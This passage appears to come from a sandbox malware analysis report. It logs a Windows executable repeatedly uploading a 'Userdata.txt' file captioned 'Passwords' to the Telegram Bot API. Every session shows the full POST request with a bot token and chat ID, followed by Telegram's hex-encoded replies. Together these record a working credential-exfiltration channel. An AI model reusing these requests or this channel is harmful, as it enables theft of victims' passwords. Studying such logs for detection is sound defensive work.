2025-01-10 21:32:00 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 32 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43584,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544720,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.3	50004	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:01 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3275c3beec6f Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:01 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 37 35 63 33 62 65 65 63 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3275c3beec6fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:02 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:01 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:02 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 32 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43585,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544721,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.3	50006	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:03 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd328cb97b4bfd Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:03 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 38 63 62 39 37 62 34 62 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd328cb97b4bfdContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:03 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:03 GMT Content-Type: application/json Content-Length: 541 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:03 UTC	541	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 32 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43586,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544723,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.3	50008	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:05 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd329f93438a7a Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:05 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 39 66 39 33 34 33 38 61 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd329f93438a7aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:05 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:05 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:05 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43587,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544725,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.3	50010	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:06 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32b3b773e5e7 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:06 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 62 33 62 37 37 33 65 35 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32b3b773e5e7Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:06 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:06 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:06 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 32 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43588,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544726,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.3	50012	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:08 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32c3c9fc6045 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:08 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 63 33 63 39 66 63 36 30 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32c3c9fc6045Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:08 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:08 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:08 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43589,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544728,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.3	50014	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:09 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32d7d284421e Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:09 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 64 37 64 32 38 34 34 32 31 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32d7d284421eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:10 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:09 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:10 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 32 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43590,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544729,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.3	50016	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:11 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32ebcbf40f9a Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:11 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 65 62 63 62 66 34 30 66 39 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32ebcbf40f9aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:11 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:11 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:11 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43591,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544731,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.3	50018	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:13 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32fe62e3e93f Host: api.telegram.org Content-Length: 1090
